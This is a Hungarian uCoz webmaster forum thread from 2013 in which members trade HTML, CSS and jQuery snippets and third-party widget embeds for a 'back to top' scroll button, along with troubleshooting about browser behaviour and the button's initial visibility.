Oldal 1 / 212»
A fórum moderátora: KovJonas 
uCoz közösség » Webmester-részleg » A honlap külalakjának testreszabása » "A lap tetejére" gomb
"A lap tetejére" gomb
bigblog
Üzenetek: 1662
Hírnév: 47

Üzenet # 1 | 10:43
Hogyan lehet egy "a lap tetejére" gombot beilleszteni a weboldalamra (mint itt a Fórumon)?
Tudom, nem olyan fontos, de mégis, érdekel biggrin

Ingyenes erőforrások uCoz-os honlapodra!

Weboldaladat itt mutathatod be! A túlzott spammolás a profil letiltását is eredményezheti.
vmarci21
A fórum moderátora
Üzenetek: 951
Hírnév: 52

Üzenet # 2 | 13:53
http://bit.ly/1evsAAH
Partner és főmoderátor.

Kérdezés előtt használd a keresőt és a linktárat!
into.hu! | VideoRemote
remus
Üzenetek: 137
Hírnév: 17

Üzenet # 3 | 17:06
Idézet (bigblog)
Hogyan lehet egy "a lap tetejére" gombot beilleszteni a weboldalamra (mint itt a Fórumon)?
Tudom, nem olyan fontos, de mégis, érdekel


SZia.
Egyszerűen a következő kódot másold be a vezérlőpult/külalak szerkesztés/a honlap alsó része-be:

Kód
<div id="navigation_up_down_87260"><noscript>Javascript is disable - <a href="http://www.webestools.com/">Webestools</a> - <a href="http://www.webestools.com/navigation-buttons-generator-scroll-top-bottom-shortcut-page-up-down-scroll-buttons-javascript.html">Navigation Buttons Generator html scroll up down</a></noscript><script type="text/javascript" src="http://services.webestools.com/navigation_up_down/2-87260-right.js"></script></div>

Én ezt használom.Ez az oldal tetejére és aljára is navigál. biggrin
bigblog
Üzenetek: 1662
Hírnév: 47

Üzenet # 4 | 15:44
Hát kedves remus... Nem rossz ötlet, csak hát megpróbáltam a Dragonbiten és megnyomom a 'lefele' gombot és csak felfele fut...

Nem lehet valahogy eltűntetni a 'lefele' gombot?

Amúgy a jQuery-s megoldás is jó...

Hozzáadva (13.09.2013, 14:44)
---------------------------------------------
Hát vmarci21 sajnos nem tudom, hova illesszem be ennek a kódját:
http://mattvarone.com/web-design/uitotop-jquery-plugin/

Nekem ez tetszett a legjobban...

Ingyenes erőforrások uCoz-os honlapodra!

Weboldaladat itt mutathatod be! A túlzott spammolás a profil letiltását is eredményezheti.
vmarci21
A fórum moderátora
Üzenetek: 951
Hírnév: 52

Üzenet # 5 | 17:06
bigblog, nem kell túlbonyolítani:

http://jsfiddle.net/mnQb6/42/

És a képet lecserélheted, és akkor már ugyan olyan mint a linkelten....

Partner és főmoderátor.

Kérdezés előtt használd a keresőt és a linktárat!
into.hu! | VideoRemote
bigblog
Üzenetek: 1662
Hírnév: 47

Üzenet # 6 | 19:02
Bocsi, hogy megint fárasztalak, vmarci21, de még mindig nem tudom mit és hova kell elhelyezni...
Pontosabban el tudnád magyarázni?

Ingyenes erőforrások uCoz-os honlapodra!

Weboldaladat itt mutathatod be! A túlzott spammolás a profil letiltását is eredményezheti.
vmarci21
A fórum moderátora
Üzenetek: 951
Hírnév: 52

Üzenet # 7 | 19:05
bigblog, http://htmliskola.uw.hu/ mondjuk a 16-os, és a 17-es leckét átnézhetnéd wink
Partner és főmoderátor.

Kérdezés előtt használd a keresőt és a linktárat!
into.hu! | VideoRemote
bigblog
Üzenetek: 1662
Hírnév: 47

Üzenet # 8 | 19:11
Értem én! Nem azzal van a gond...
Ott kiírja, hogy HTML, CSS, JavaScript, meg az előnézet.
De hova kell tenni mindegyiket. Nincs nagy gondom a HTML-lel, de azért átnézem...

Hozzáadva (14.09.2013, 18:11)
---------------------------------------------
Amúgy meg minden, ami ott van, le van töltve biztonságimásként a gépemre...


Ingyenes erőforrások uCoz-os honlapodra!

Weboldaladat itt mutathatod be! A túlzott spammolás a profil letiltását is eredményezheti.
Textador
Üzenetek: 16
Hírnév: 4

Üzenet # 9 | 13:42
a gondom még mindig ugyan az.. ha frissítem a lap tetején állva az oldalt, a gomb megjelenik, pedig nem kellene..mi a bibi? itt a szkript:
Kód
<a href="#" class="scrollup"><img src="http://getting-started.ucoz.hu/UP.png" border="0" align="right" alt="lap tetejére" title="lap tetejére" style="bottom:0px; right:20px; z-index:100; position:fixed; width:100px; height:100px; "/>
  <script type="text/javascript">
  $(document).ready(function(){
   
  $(window).scroll(function(){
  if ($(this).scrollTop() > 400) {
  $('.scrollup').fadeIn();
  } else {
  $('.scrollup').fadeOut();
  }
  });
   
  $('.scrollup').click(function(){
  $("html, body").animate({ scrollTop: 0 }, 1500);
  return false;
  });
   
  });
       
</script></a>

Textador,Getting-Started Owner
vmarci21
A fórum moderátora
Üzenetek: 951
Hírnév: 52

Üzenet # 10 | 14:26
Textador, a scrollup-nak tegyél be egy display: none;-t CSS-be wink
Partner és főmoderátor.

Kérdezés előtt használd a keresőt és a linktárat!
into.hu! | VideoRemote
Textador
Üzenetek: 16
Hírnév: 4

Üzenet # 11 | 15:31
vmarci21, de akkor nincs animáció..én azt szeretném kijavítani,hogy a lap tetejének frissítésekor ne jelenjen meg az az ikon..>.<
Textador,Getting-Started Owner
remus
Üzenetek: 137
Hírnév: 17

Üzenet # 12 | 21:28
Idézet (bigblog)
Hát kedves remus... Nem rossz ötlet, csak hát megpróbáltam a Dragonbiten és megnyomom a 'lefele' gombot és csak felfele fut.

A belépési oldalon és a főoldalon is fel van tűntetve,hogy az oldal mozilla böngészőre van optimalizálva.
Bárki,bármilyen scriptet rak be,ellenőrizze más böngészőkkel is a működését,mert (javítsatok ki,ha tévedek) a ucoz rendszer mozillára van optimalizálva.

Röviden: a script helyesen,csakis mozilla böngészővel műxik.
wink
bigblog
Üzenetek: 1662
Hírnév: 47

Üzenet # 13 | 08:54
Idézet (remus)
A belépési oldalon és a főoldalon is fel van tűntetve,hogy az oldal mozilla böngészőre van optimalizálva.


Értem én... Csak hát nem csak Mozilla böngészővel szörfölnek az emberek a neten... de mindegy. Már találtam más megoldást smile

Hozzáadva (26.09.2013, 12:56)
---------------------------------------------
Úgy néz ki, eléggé sokakat érdekel ez a téma smile

Hozzáadva (26.10.2013, 07:54)
---------------------------------------------
Kaptam egy szkriptet, ami 100%-osan működik!
http://ucoztaska.ucoz.hu/forum/30-38-1


Ingyenes erőforrások uCoz-os honlapodra!

Weboldaladat itt mutathatod be! A túlzott spammolás a profil letiltását is eredményezheti.
remus
Üzenetek: 137
Hírnév: 17

Üzenet # 14 | 21:48
Sziasztok.
Az ezen a fórumon is megjelenő laptetejére gomb kódja:
Kód
<SCRIPT src="http://bambun.ru/css_js/strelka_exe.js" type="text/javascript" language="javascript"></SCRIPT>
<a id="gotop" class="scrollTop" href="#" onclick="top.goTop(); return false;" style="text-align: justify;"><script src="http://xall-pc.ru/up.js" type="text/javascript"></script></a>
<style type="text/css">
.scrollTop{
background:url(http://bambun.ru/images/up.png) 0 0 no-repeat;
display:block; width:32px; height:32px;
position:fixed; bottom:20px; right:1%;
z-index:2000;
}
.scrollTop:hover{ background-position:0 -58px; }
</style>


Használjátok egészséggel. smile
bigblog
Üzenetek: 1662
Hírnév: 47

Üzenet # 15 | 21:54
remus, köszi, de az én szkriptem teljesen személyre szabható és 100%-osan működik!

http://ucoztaska.ucoz.hu/forum/30-38-1

Ingyenes erőforrások uCoz-os honlapodra!

Weboldaladat itt mutathatod be! A túlzott spammolás a profil letiltását is eredményezheti.
uCoz közösség » Webmester-részleg » A honlap külalakjának testreszabása » "A lap tetejére" gomb
Oldal 1 / 212»
Keresés: